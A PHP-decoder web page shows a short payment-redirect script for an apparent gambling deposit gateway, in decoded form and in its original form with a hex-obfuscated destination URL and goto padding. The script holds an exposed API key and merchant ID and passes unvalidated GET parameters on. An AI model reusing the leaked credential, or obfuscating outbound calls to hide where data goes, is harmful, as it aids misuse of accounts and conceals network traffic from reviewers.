Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // ini_set('display_errors', 1); // ini_set('display_startup_errors', 1); // erro..

Decoded Output download

<?php 
// ini_set('display_errors', 1); 
// ini_set('display_startup_errors', 1); 
// error_reporting(E_ALL); 
 
session_start(); 
// https://primewin.live/payment/payment.php?user=null&am=200 
$post = [ 
    'type' => "deposit", 
      'api' => '98fba44ec08d4b65a753d6c1e4a0c5cc', 
  'merchant' => '777777364', 
    'order' => 'MrbeanDevxx'.$_GET['user'].'xx'.time(), 
    'callback' => 'https://www.pshpi-t2eb.in/payment/wowpay/confirm.php', 
    'pay_type' => '151', 
    'amount' => $_GET['am'] 
]; 
 
function post($url, $data) 
{ 
	$curl = curl_init($url); 
	curl_setopt($curl, CURLOPT_POST, true); 
	curl_setopt($curl, CURLOPT_POSTFIELDS, $data); 
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 
	$response = curl_exec($curl); 
	curl_close($curl); 
	return $response; 
} 
 
 goto ETX20; ETX20: header("Location: " . json_decode(post("https://mrbean.dev/wowpay/", $post))->payInfo); goto zhFF4; zhFF4: die; goto cwp3W; cwp3W: 
die(); 
 
?>

Did this file decode correctly?

Original Code

<?php
// ini_set('display_errors', 1);
// ini_set('display_startup_errors', 1);
// error_reporting(E_ALL);

session_start();
// https://primewin.live/payment/payment.php?user=null&am=200
$post = [
    'type' => "deposit",
      'api' => '98fba44ec08d4b65a753d6c1e4a0c5cc',
  'merchant' => '777777364',
    'order' => 'MrbeanDevxx'.$_GET['user'].'xx'.time(),
    'callback' => 'https://www.pshpi-t2eb.in/payment/wowpay/confirm.php',
    'pay_type' => '151',
    'amount' => $_GET['am']
];

function post($url, $data)
{
	$curl = curl_init($url);
	curl_setopt($curl, CURLOPT_POST, true);
	curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
	$response = curl_exec($curl);
	curl_close($curl);
	return $response;
}

 goto ETX20; ETX20: header("\x4c\157\143\141\x74\x69\x6f\x6e\x3a\x20" . json_decode(post("\150\164\x74\160\163\x3a\x2f\57\x6d\x72\x62\x65\141\156\56\x64\145\x76\57\x77\157\167\x70\x61\x79\x2f", $post))->payInfo); goto zhFF4; zhFF4: die; goto cwp3W; cwp3W:
die();

?>

Function Calls

None

Variables

None

Stats

MD5 1e77e885e548c900fb1b93db9449f2cf
Eval Count 0
Decode Time 92 ms